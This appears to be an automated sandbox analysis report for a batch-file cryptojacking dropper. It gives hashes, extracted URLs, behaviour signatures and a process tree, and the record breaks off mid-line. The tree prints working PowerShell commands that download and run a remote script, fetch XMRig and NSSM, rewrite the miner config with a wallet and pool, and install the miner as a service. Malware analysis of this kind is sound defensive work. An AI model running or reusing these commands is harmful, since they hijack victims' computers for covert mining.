Analysis

  • max time kernel
    149s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 03:53

General

  • Target

    3000513059307.bat

  • Size

    517B

  • MD5

    ac9d73455d58bfa42f81e718b8c8d6b5

  • SHA1

    60040fff333b7bc09b22e5c013f11b8a99555ed3

  • SHA256

    4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

  • SHA512

    ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rentry.co/regele/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

  • XMRig Miner payload 17 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 3 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Delays execution with timeout.exe 64 IoCs
  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3000513059307.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp323B.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Windows\system32\net.exe
          net session
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 session
            5⤵
              PID:2948
          • C:\Windows\system32\where.exe
            where powershell
            4⤵
              PID:3452
            • C:\Windows\system32\where.exe
              where find
              4⤵
                PID:4112
              • C:\Windows\system32\where.exe
                where findstr
                4⤵
                  PID:436
                • C:\Windows\system32\where.exe
                  where tasklist
                  4⤵
                    PID:2952
                  • C:\Windows\system32\where.exe
                    where sc
                    4⤵
                      PID:1636
                    • C:\Windows\system32\sc.exe
                      sc stop moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:1532
                    • C:\Windows\system32\sc.exe
                      sc delete moneroocean_miner
                      4⤵
                      • Launches sc.exe
                      PID:2560
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /t /im xmrig.exe
                      4⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1088
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
                      4⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2260
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4072
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3496
                    • C:\Users\Admin\moneroocean\xmrig.exe
                      "C:\Users\Admin\moneroocean\xmrig.exe" --help
                      4⤵
                      • Executes dropped EXE
                      PID:3312
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4904
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
                        5⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3120
                        • C:\Windows\system32\HOSTNAME.EXE
                          "C:\Windows\system32\HOSTNAME.EXE"
                          6⤵
                            PID:1112
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3712
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4472
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ejefcdnk\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4924
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:592
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2044
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4380
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
                        4⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3788
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1488
                      • C:\Windows\system32\sc.exe
                        sc stop moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:4340
                      • C:\Windows\system32\sc.exe
                        sc delete moneroocean_miner
                        4⤵
                        • Launches sc.exe
                        PID:4336
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:3320
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
                        4⤵
                        • Executes dropped EXE
                        PID:740
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
                        4⤵
                        • Executes dropped EXE
                        PID:2324
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
                        4⤵
                        • Executes dropped EXE
                        PID:3152
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
                        4⤵
                        • Executes dropped EXE
                        PID:3712
                      • C:\Users\Admin\moneroocean\nssm.exe
                        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
                        4⤵
                        • Executes dropped EXE
                        PID:3452
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                    2⤵
                      PID:4452
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic cpu get loadpercentage
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2824
                    • C:\Windows\system32\timeout.exe
                      timeout /t 1
                      2⤵
                      • Delays execution with timeout.exe
                      PID:3988
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                      2⤵
                        PID:1284
                        • C:\Windows\System32\Wbem\WMIC.exe
                          wmic cpu get loadpercentage
                          3⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3576
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        2⤵
                        • Delays execution with timeout.exe
                        PID:1360
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                        2⤵
                          PID:1560
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic cpu get loadpercentage
                            3⤵
                              PID:2672
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            2⤵
                            • Delays execution with timeout.exe
                            PID:1824
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                            2⤵
                              PID:2492
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic cpu get loadpercentage
                                3⤵
                                  PID:2236
                              • C:\Windows\system32\timeout.exe
                                timeout /t 1
                                2⤵
                                • Delays execution with timeout.exe
                                PID:4936
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                2⤵
                                  PID:2740
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic cpu get loadpercentage
                                    3⤵
                                      PID:4604
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 1
                                    2⤵
                                    • Delays execution with timeout.exe
                                    PID:4852
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                    2⤵
                                      PID:2968
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic cpu get loadpercentage
                                        3⤵
                                          PID:3392
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:2400
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                        2⤵
                                          PID:456
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic cpu get loadpercentage
                                            3⤵
                                              PID:4912
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:3360
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                            2⤵
                                              PID:1592
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic cpu get loadpercentage
                                                3⤵
                                                  PID:5044
                                              • C:\Windows\system32\timeout.exe
                                                timeout /t 1
                                                2⤵
                                                • Delays execution with timeout.exe
                                                PID:3888
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                2⤵
                                                  PID:4104
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic cpu get loadpercentage
                                                    3⤵
                                                      PID:2556
                                                  • C:\Windows\system32\timeout.exe
                                                    timeout /t 1
                                                    2⤵
                                                    • Delays execution with timeout.exe
                                                    PID:4980
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                    2⤵
                                                      PID:1636
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic cpu get loadpercentage
                                                        3⤵
                                                          PID:4632
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout /t 1
                                                        2⤵
                                                        • Delays execution with timeout.exe
                                                        PID:1732
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                        2⤵
                                                          PID:1332
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic cpu get loadpercentage
                                                            3⤵
                                                              PID:4520
                                                          • C:\Windows\system32\timeout.exe
                                                            timeout /t 1
                                                            2⤵
                                                              PID:4424
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                              2⤵
                                                                PID:4432
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic cpu get loadpercentage
                                                                  3⤵
                                                                    PID:764
                                                                • C:\Windows\system32\timeout.exe
                                                                  timeout /t 1
                                                                  2⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:5016
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                  2⤵
                                                                    PID:3104
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic cpu get loadpercentage
                                                                      3⤵
                                                                        PID:4616
                                                                    • C:\Windows\system32\timeout.exe
                                                                      timeout /t 1
                                                                      2⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:3044
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                      2⤵
                                                                        PID:4092
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic cpu get loadpercentage
                                                                          3⤵
                                                                            PID:864
                                                                        • C:\Windows\system32\timeout.exe
                                                                          timeout /t 1
                                                                          2⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:2828
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                          2⤵
                                                                            PID:628
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic cpu get loadpercentage
                                                                              3⤵
                                                                                PID:4476
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout /t 1
                                                                              2⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4936
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                              2⤵
                                                                                PID:3492
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic cpu get loadpercentage
                                                                                  3⤵
                                                                                    PID:872
                                                                                • C:\Windows\system32\timeout.exe
                                                                                  timeout /t 1
                                                                                  2⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:1480
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                  2⤵
                                                                                    PID:4064
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic cpu get loadpercentage
                                                                                      3⤵
                                                                                        PID:1404
                                                                                    • C:\Windows\system32\timeout.exe
                                                                                      timeout /t 1
                                                                                      2⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:4408
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                      2⤵
                                                                                        PID:3992
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic cpu get loadpercentage
                                                                                          3⤵
                                                                                            PID:1412
                                                                                        • C:\Windows\system32\timeout.exe
                                                                                          timeout /t 1
                                                                                          2⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:4320
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                          2⤵
                                                                                            PID:836
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic cpu get loadpercentage
                                                                                              3⤵
                                                                                                PID:4336
                                                                                            • C:\Windows\system32\timeout.exe
                                                                                              timeout /t 1
                                                                                              2⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:1516
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                              2⤵
                                                                                                PID:4144
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic cpu get loadpercentage
                                                                                                  3⤵
                                                                                                    PID:5044
                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                  timeout /t 1
                                                                                                  2⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:3712
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                  2⤵
                                                                                                    PID:1376
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic cpu get loadpercentage
                                                                                                      3⤵
                                                                                                        PID:2936
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      timeout /t 1
                                                                                                      2⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:1464
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                      2⤵
                                                                                                        PID:2956
                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                          wmic cpu get loadpercentage
                                                                                                          3⤵
                                                                                                            PID:876
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout /t 1
                                                                                                          2⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:1636
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                          2⤵
                                                                                                            PID:3944
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic cpu get loadpercentage
                                                                                                              3⤵
                                                                                                                PID:3676
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 1
                                                                                                              2⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:1148
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                              2⤵
                                                                                                                PID:2516
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic cpu get loadpercentage
                                                                                                                  3⤵
                                                                                                                    PID:1332
                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                  timeout /t 1
                                                                                                                  2⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:412
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                  2⤵
                                                                                                                    PID:4484
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic cpu get loadpercentage
                                                                                                                      3⤵
                                                                                                                        PID:2316
                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                      timeout /t 1
                                                                                                                      2⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:4376
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                      2⤵
                                                                                                                        PID:4208
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic cpu get loadpercentage
                                                                                                                          3⤵
                                                                                                                            PID:4792
                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                          timeout /t 1
                                                                                                                          2⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:916
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                          2⤵
                                                                                                                            PID:4416
                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                              wmic cpu get loadpercentage
                                                                                                                              3⤵
                                                                                                                                PID:4616
                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                              timeout /t 1
                                                                                                                              2⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:2340
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                              2⤵
                                                                                                                                PID:548
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                  3⤵
                                                                                                                                    PID:4940
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout /t 1
                                                                                                                                  2⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:1876
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                  2⤵
                                                                                                                                    PID:4648
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                      3⤵
                                                                                                                                        PID:628
                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                      timeout /t 1
                                                                                                                                      2⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:744
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                      2⤵
                                                                                                                                        PID:1616
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                          3⤵
                                                                                                                                            PID:2740
                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                          timeout /t 1
                                                                                                                                          2⤵
                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                          PID:3492
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                          2⤵
                                                                                                                                            PID:1480
                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                              3⤵
                                                                                                                                                PID:452
                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                              timeout /t 1
                                                                                                                                              2⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4064
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                              2⤵
                                                                                                                                                PID:2080
                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                  3⤵
                                                                                                                                                    PID:4340
                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                  timeout /t 1
                                                                                                                                                  2⤵
                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                  PID:976
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1488
                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                      wmic cpu get loadpercentage
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4884
                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                      timeout /t 1
                                                                                                                                                      2⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:4912
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1516
                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                          wmic cpu get loadpercentage
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2952
                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                          timeout /t 1
                                                                                                                                                          2⤵
                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                          PID:5044
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1380
                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                              wmic cpu get loadpercentage
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3712
                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                              timeout /t 1
                                                                                                                                                              2⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:4960
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1472
                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                  wmic cpu get loadpercentage
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:3884
                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                  timeout /t 1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1476
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4156
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic cpu get loadpercentage
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3984
                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                        timeout /t 1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3676
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
